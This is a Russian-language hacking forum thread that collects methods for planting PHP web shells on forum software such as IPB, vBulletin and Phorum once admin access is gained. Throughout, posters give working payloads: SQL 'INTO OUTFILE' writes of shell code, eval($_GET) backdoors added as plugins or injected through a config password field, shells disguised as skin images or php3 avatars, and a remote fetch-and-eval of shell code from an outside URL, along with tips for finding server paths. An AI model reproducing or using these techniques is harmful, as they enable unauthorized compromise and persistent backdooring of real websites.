Заливка шелла в Форуме Решил собрать все вместе, да бы уменьшить бояновые темы в разделе. Все вопросы, касающиеся заливки шелла в Форуме, задаем сюда. Приветствуется помощь в наполнении темы актуальным материалом. He11.net Forums 1 Ikonboard 1,2 IPB 1,2 Pehota Forum 1 PHPbb 1,2,3,4 SMDS Forum 1 SMF 1 SowiBB 1 vBulletin 1,2 VumFOrum 1 WR 1 © ZAMUT ---------------------------------------------------------------------- Имею полную админку в IPB 1.3, шел через смайлы не катит - ибо там стоят права на запись.. единственная папка с 777 - это uploads, так вот.. моя цель - это залить шелл в эту папку.. действия таковы. Создаю базу.. Заливаю код Code: INSERT INTO `shell` bla bla.. и выдираю его в файл Code: SELECT ("код шела") INTO OUTFILE '/var/www/forum/uploads/counter.php'; Загвозка, в том.. что в код вставляются слешы.. из-за них не работает шел.. я уже даж делал c LINE терминатеж бай.. вообщем, не знаю, как избавится от слешей в коде. Ввиду сегодняшнего гуглежа узнал, что они находятся на уровне php.ini. Прошу помощи в составлении запроса. added@ на запросы внимания не обращайте.. писал машинально.
проще через шаблон заливаешь скин, далее картинки с шеллом в скин, удаляешь скин... картинки с шеллами остаются... если нужно скину такой скин
В общем все просто находим доступ в админку, заходим Далее - Внешний Вид тут: Если скин IP.Board Pro то делаем так: 1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем. 2. Импорт и экспорт стилей - Импорт... - Импорт изображений выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем узнаем где лежит шелл, заходим в настройки скина IP.Board Pro Директория с изображениями - ip.boardpr1228455805 (в моем случае) Изменяем так как было изночально. Шелл будет доступен в директории http://site/style_images/ip.boardpr1228455805/folder_js_skin/js_skin.php Если нет скина IP.Board Pro делаем так: Импорт и экспорт стилей - Импорт... - Импорт шаблонов стиля 1. Импорт шаблонов стиля выбираем ipb_skin-ip.boardpr.xml.gz (Какую директорию с изображениями использовать в этом стиле? - Никакую) Залили.. далее 2. Импорт изображений выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? - там будет что-то типо IP.Board Pro) импортировали... опять таки заходим в настройки скина, смотрим адресс директории http://site/style_images/ip.boardpr/folder_js_skin/js_skin.php и не забудьте его удалить, шаблоны удалятся, а картинки нет =) Объясняю как сделать скин с шеллами 1. Ставим себе форум. 2. Закидываем в папку forum/style_images/нужный вам скин шеллы куда вам нужно. 3. Заходим в админку форума Внешний Вид - Импорт и экспорт стилей - Экспорт... Какой стиль экспортировать? - выбираем какой нужен Экспорт изображений Какие изображения экспортировать? - выбираем папку с шеллами. http://upload.com.ua/get/900580228 - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал
2 schut123 Правил картинку вставлял в нее код. Сделать можно сохранив картинку в фотошопе и открыв hiew найти мето где написанно "Photoshop ....." менял на php код. Если перед этим открыть в паинте и сохранить место сдвинется ближе к начату файла что лучше. Загружал картинку на сервер через админку способов я помню там полно. Потом в админке форума создавал новую задачу прописывал путь к картинке и жал выполнить. Картинка jpg В конфигурации можно изменить пути к директории на чтото типа ../../../../../tmp чтобы не париться с путями
RazyKK попробуй по одному ввести, тоесть сначала which lynx потом which wget и т.д. Заливка links links -source "http://откуда/shell.php" > /папка/куда/shell.php
1) Вкладка общие --> Безопасность Разрешить php в шаблонах: Да 2)Вкладка Стили --> Компоненты стилей ->> Шаблоны С помощью встроенного редактора шаблонов выбираем файл и пишем в него: Код: <!-- PHP --> phpinfo(); <!-- ENDPHP --> Далее применяем шаблон, идем на измененную страницу и видим наш php код Этот способ описал DeepXhadow за что ему +
узнать путь не особая проблема: 1. поюзай гугл inurl:site.com "error" 2. просканируй сайт на дириктории (часто бывают случаи что открыты дирриктории в которых лежат php скрипты, которые при примом открытии выдают ошибку синтаксическу ну и раскрытие) 3. потыкай скрипты что кроме форумного движка стоят (если есть) 4. реверс айпи, тыкаешь другие сайты на поиск раскрытия путей (часто случается что путь выглядет /usr/home/domain.com/htdocs/; /usr/home/domain2.com/htdocs/) включи мозги
Code: 1. Заходим в админку. 2. Система модулей. 3. Добавить новый модуль. Продукт: ставим vBulletin Месторасположение: faq_complete Код: eval($_GET[e]); потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo(); льем шелл, возвращаемся в админку, удаляем модуль faq_complete
можно так попробовать: вариант1: Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php' полный путь можно посмотреть так: ->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO Тестилось на IBP 3.0.1 nulled шелл: http://site.ru/uploads/shell.php PS: Нужны соответствующие права вариант2: Форумы->Прикрепляемые файлы->Типы файлов жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - image/gif->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да. Топаем в свой профиль: http://site.ru/index.php?app=core&module=usercp&tab=members&area=avatar грузим аву-шелл с расширением php3 и получаем шелл по адресу: http://site.ru/uploads/av-1.php3
Версия: phorum-3.4.6 Зависимости: Нужны права админа. Наткнулся совершенно случайно, версия оч старая, нагуглил архив, скал, стал изучать исходники, и почти сразу наткнулся на то что конфигурация форума сохраняется в PHP файл: Code: C:\wamp\www\phorum-3.4.6\phorum-3.4.6\admin\settings\forums.php Что дает нам возможность внедрить в конфиги пару своих строк =) Последние строки в конфиг файле: PHP: // database variables $PHORUM['DatabaseServer']=''; $PHORUM['DatabaseName']=''; $PHORUM['DatabaseUser']=''; $PHORUM['DatabasePassword']=''; ?> Чтоб не нарушить структуру файла, идем в раздел Конфигурации БД: Code: http://www.SITE.COM/forum/admin/index.php?page=db В поле Password: дописываем к текущему паролю строку: Code: '; @eval(stripslashes($_GET['cmd'])); echo ' И получаем бэкдор по пути: Code: http://www.SITE.COM/forum/admin/settings/forums.php
пробывал залить шелл способом пашкеллы. phpinfo показывает, но погда уже прописываю /faq.php?e=wget линк на шелл пишет Code: Parse error: syntax error, unexpected T_STRING in public_html/faq.php(324) : eval()'d code(1) : eval()'d code on line 1 код в модуле Code: eval($_GET[e]);
все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo(); а где тут загружать шелл найти не могу. Помогите кто сталкивался
Это просто проверка рабоспособности бэкдора, чтобы получить полноценный шелл нужно взять любой шелл и залить его в txt формате в коде убрать в начале <?php и в конце ?> После вместо phpinfo(); вставляем eval(file_get_contents('http://site.com/shell.txt'));
Попробывал данный способ нечего не вышло(( показывает что маркер безопастности отсутствует после ввода пароля входа в шелл
